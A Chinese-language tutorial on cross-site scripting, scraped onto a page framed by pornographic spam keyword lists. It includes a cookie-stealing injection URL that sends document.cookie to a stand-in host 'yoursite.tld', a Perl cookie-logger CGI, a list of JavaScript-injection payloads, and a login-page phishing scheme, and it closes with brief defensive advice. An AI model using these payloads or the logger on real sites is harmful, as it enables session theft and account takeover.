六月婷婷综合激情-六月婷婷综合-六月婷婷在线观看-六月婷婷在线-亚洲黄色在线网站-亚洲黄色在线观看网站

明輝手游網中心:是一個免費提供流行視頻軟件教程、在線學習分享的學習平臺!

跨站腳本攻擊

[摘要]以前看過分析家寫過一篇文章,介紹跨站腳本的安全隱患,當時只是知道有這樣的 問題,也沒有仔細閱讀,目前此類問題經常在一些安全站點發布,偶剛好看到這樣一篇文章 , 抱著知道總比不知道好的想法,翻譯整理了一下,原文在偶主頁的collection目錄里,錯誤 之處請 多多指點。 OK,go...........

以前看過分析家寫過一篇文章,介紹跨站腳本的安全隱患,當時只是知道有這樣的
問題,也沒有仔細閱讀,目前此類問題經常在一些安全站點發布,偶剛好看到這樣一篇文章

抱著知道總比不知道好的想法,翻譯整理了一下,原文在偶主頁的collection目錄里,錯誤
之處請
多多指點。
OK,go............

什么是跨站腳本(CSS/XSS)?

我們所說跨站腳本是指在遠程WEB頁面的html代碼中插入的具有惡意目的的數據,用戶認為該
頁面是可信賴的,但是當瀏覽器下載該頁面,嵌入其中的腳本將被解釋執行,
有時候跨站腳本被稱為"XSS",這是因為"CSS"一般被稱為分層樣式表,這很容易讓人困惑,
如果
你聽某人提到CSS或者XSS安全漏洞,通常指得是跨站腳本。


XSS和腳本注射的區別?

原文里作者是和他一個朋友(b0iler)討論后,才明白并非任何可利用腳本插入實現攻擊的
漏洞都被稱為XSS,還有另一種攻擊方式:"Script Injection",他們的區別在以下兩點:
1.(Script Injection)腳本插入攻擊會把我們插入的腳本保存在被修改的遠程WEB頁面里,如
:sql injection,XPath injection.
2.跨站腳本是臨時的,執行后就消失了
什么類型的腳本可以被插入遠程頁面?

主流腳本包括以下幾種:
HTML
JavaScript (本文討論)
VBScript
ActiveX
Flash


是什么原因導致一個站點存在XSS的安全漏洞?

許多cgi/php腳本執行時,如果它發現客戶提交的請求頁面并不存在或其他類型的錯誤時,
出錯信息會被打印到一個html文件,并將該錯誤頁面發送給訪問者。
例如: 404 - yourfile.html Not Found!

我們一般對這樣的信息不會注意,但是現在要研究CSS漏洞的成因,我們還是仔細看一下。
例:www.somesite.tld/cgi-bin/program.cgi?page=downloads.html
該URL指向的連接是有效的,但是如果我們把后面的downloads.html替換成brainrawt_owns_
me.html
,一個包含404 - brainrawt_owns_me.html Not Found! 信息的頁面將反饋給訪問者的瀏覽
器。
考慮一下它是如何把我們的輸入寫到html文件里的?

OK,現在是我們檢查XSS漏洞的時候了!

注意:下面僅僅是一個例子,該頁面存在XSS漏洞,我們可以插入一寫javascript代碼到頁面
里。當然方法很多
www.somesite.tld/cgi-bin/program.cgi?page=<script>alert('XSS_Vuln_Testing')</sc
ript>
當我們提交這個URL的時候,在我們的瀏覽器中彈出一個消息框,"XSS_Vuln_Testing"?
這個例子只是一個XSS漏洞的簡單演示,并無實際意義,但足以說明問題所在。

下面我們分析一下造成該運行結果的原因,program.cgi對我們的輸入沒有經過有效過濾處理

就直接寫入404 error頁面中,結果創建了一個頁面,如下:
<html>

<b>404</b> - <script>alert('XSS_Vuln_Testing')</script> Not Found!

</html>

其中的javascript腳本通過瀏覽器解釋執行,然后就出現了你所看到的結果。


如何利用XSS來完成hacking?

如同前面所提到,如果用戶提交的請求不能得到滿足,那么服務器端腳本會把輸入信息寫入
一個
html文件,當服務器端程序對寫入html文件的數據沒有進行有效過濾,惡意腳本就可以插入

該html文件里。其他用戶瀏覽該連接的時候腳本將通過客戶端瀏覽器解釋執行。

事例:

假設你發現myemailserver.tld有CSS漏洞,你想要獲得其中一個人的email帳號,比如我們的
目標是b00b這個人。
www.myemailserver.tld/cgi-bin/news.cgi?article=59035
把上面存在CSS漏洞的連接修改一下:
www.myemailserver.tld/cgi-bin/news.cgi?article=hax0red
這會創建了一個錯誤頁面,我們得到如下信息:
Invalid Input! [article=hax0red]

當插入下面這樣的javascript代碼時,你的屏幕上會彈出一個包含test的消息框。
www.myemailserver.tld/cgi-bin/news.cgi?article=<script>alert('test')<
/script>
<script>并沒有打印到屏幕上,它是隱藏在背后執行,由于服務器端程序并沒有對
<script>alert('test')</script>進行有效過濾,所以在頁面發回到瀏覽器并執行了該腳本


下面我們瞧瞧如何利用該漏洞入侵 b00b同志的郵箱,首先你必須知道b00b的email地址,
并且知道cookies的作用。那么你可以告訴b00b一個惡意的連接,嘿嘿,當然
它的用意就是從b00b機器中cookie信息里獲得自己想要的東東。
想辦法讓b00b訪問myemailserver.tld站點發表的文章,比如說:”親愛的b00b,看看這個美

如何呀?”

那么當可憐的b00b訪問 www.myemailserver.tld/cgi-bin/news.cgi?article=<script>偷取
并保存cookie的腳本
</script>
連接時,發生什么事情?cookie都有了,你該知道怎么辦了吧!

如果在你目前不是這樣的情形,你可以拷貝email服務器的登陸頁面,掛到其他的系統上,
然后引導用戶登陸你的惡意系統頁面
這樣用戶信息你可以記錄下來,然后再把記錄的信息發送回真正的email服務器頁面,
那些笨蛋并不會意識到實際發生的事情。

把javascript腳本插入WEB頁面的不同方法:

<snip>
拷貝自:GOBBLES SECURITY ADVISORY #33
Here is a cut-n-paste collection of typical JavaScript-injection hacks
you may derive some glee from playing with.

<a href="javascript#<DIV class=articlecode de>">
<div onmouseover="<DIV class=articlecode de>">
<img src="javascript:<DIV class=articlecode de>">
<img dynsrc="javascript:<DIV class=articlecode de>"> [IE]
<input type="image" dynsrc="javascript:<DIV class=articlecode de>"> [IE]
<bgsound src="javascript:<DIV class=articlecode de>"> [IE]
&<script><DIV class=articlecode de></script>
&{<DIV class=articlecode de>}; [N4]
<img src=&{<DIV class=articlecode de>};> [N4]
<link rel="stylesheet" href="javascript:<DIV class=articlecode de>">
<iframe src="vbscript:<DIV class=articlecode de>"> [IE]
<img src="mocha:<DIV class=articlecode de>"> [N4]
<img src="livescript:<DIV class=articlecode de>"> [N4]
<a href="about:<script><DIV class=articlecode de></script>">
<meta http-equiv="refresh" content="0;url=javascript:<DIV class=articlecode de>">
<body onload="<DIV class=articlecode de>">
<div style="background-image: url(javascript:<DIV class=articlecode de>);">
<div style="behaviour: url([link to code]);"> [IE]
<div style="binding: url([link to code]);"> [Mozilla]
<div style="width: expression(<DIV class=articlecode de>);"> [IE]
<style type="text/javascript"><DIV class=articlecode de></style> [N4]
<object classid="clsid:..." codebase="javascript:<DIV class=articlecode de>"> [IE]
<style><!--</style><script><DIV class=articlecode de>//--></script>
<![CDATA[<!--]]><script><DIV class=articlecode de>//--></script>
<!-- -- --><script><DIV class=articlecode de></script><!-- -- -->
<script><DIV class=articlecode de></script>
<img src="blah"onmouseover="<DIV class=articlecode de>">
<img src="blah>" onmouseover="<DIV class=articlecode de>">
<xml src="javascript:<DIV class=articlecode de>">
<xml id="X"><a><b><script><DIV class=articlecode de></script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script><DIV class=articlecode de>[\xC0][\xBC]/script> [UTF-8; IE, Opera]

----Copied from GOBBLES SECURITY ADVISORY #33----
</snip>


一個真正的獲取cookie并且做記錄的例子:

注意:要使它工作,你的瀏覽器必須允許接受http://website.tld站點發送的cookies,
當我測試下面的信息時,使用
javascript創建訪問者的cookies,javascript腳本放在index.html文件中。
OK,下面假設http://website.tld存在XSS攻擊的安全隱患,存在漏洞的連接是:
http://website.tld/program.cgi?input=<evil javascript>
我們創建這樣一個連接:
http://website.tld/program.cgi?input=<script>document.location='http://yoursite
.tld
/cgi-bin/evil_cookie_logger.cgi?'+document.cookie</script>
然后讓保存該站點cookie的用戶訪問這個連接:

這是我們的CGI腳本,它的作用就是對用戶cookie做記錄:

---------evil_cookie_logger.cgi-----------

#!/usr/bin/perl
# evil_cookie_logger.cgi
# remote cookie logging CGI coded by BrainRawt
#
# NOTE: coded as a proof of concept script when testing for
# cross-site scripting vulnerabilities.

$borrowed_info = $ENV{'QUERY_STRING'};
$borrowed_info =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;

open(EVIL_COOKIE_LOG, ">>evil_cookie_log") or print "Content-type:
text/html\n\n something went wrong\n";
print EVIL_COOKIE_LOG "$borrowed_info\n";
print "Content-type: text/html\n\n";
close(EVIL_COOKIE_LOG);

------------------------------------------

該腳本首先通過 $ENV{'QUERY_STRING'}獲得cookie,打印到$borrowed_info變量里,
通過open(EVIL_COOKIE_LOG, ">>evil_cookie_log"),把cookie信息保存到evil_cookie_lo
g文件。

注意:上面的javascript腳本,可能在一些瀏覽器或者站點上不能執行,
這僅僅是我在自己的站點上做測試用的。

如何防范XSS攻擊?
1.在你的WEB瀏覽器上禁用javascript腳本
2..開發者要仔細審核代碼,對提交輸入數據進行有效檢查,如"<"和">"。

可以把"<",">"轉換為<,>
注意:由于XSS漏洞可被利用的多樣性,程序員自己要明白具體需要過濾的字符,
這主要依賴于所開發程序的作用,建議過濾掉所有元字符,包括"="。

對受害者來說不要訪問包含<script>字符的連接,一些官方的URL不會包括任何腳本元素。


主站蜘蛛池模板: 伊人青青视频 | 中文字幕女教师julia视频 | 视频国产一区 | 伊人四虎| 亚洲国产一成人久久精品 | 日韩精品视频免费观看 | 泄欲网站免费观看 | 亚洲欧洲日韩在线 | 亚洲人成片在线观看 | 五月丁香啪啪 | 一级免费看片 | 欧美一区二区影院 | 日韩欧美三区 | 日日夜夜免费精品视频 | 日本欧美视频 | 天天插日日插 | 亚洲福利一区二区三区 | 青青草原网站在线观看 | 日本在线成人 | 亚洲自偷| 午夜亚洲一区 | 亚洲国产一区二区三区最新 | 三级国产视频 | 日本网站在线播放 | 日本福利网址 | 亚洲黄色网址大全 | 日在线视频 | 日韩一区二区免费看 | 日韩一级视频免费观看 | 伊人久久综合 | 婷婷丁香色 | 欧美天堂在线观看 | 天天干夜夜草 | 亚洲欧洲尹人香蕉综合 | 伊人色在线 | 日韩精品一区二区三区不卡 | 欧美又肥又胖的大bbwⅹ | 午夜三级黄色片 | 天天干夜夜爱 | 亚洲成在线观看 | 庆余年第二部在线观看免费完整版 |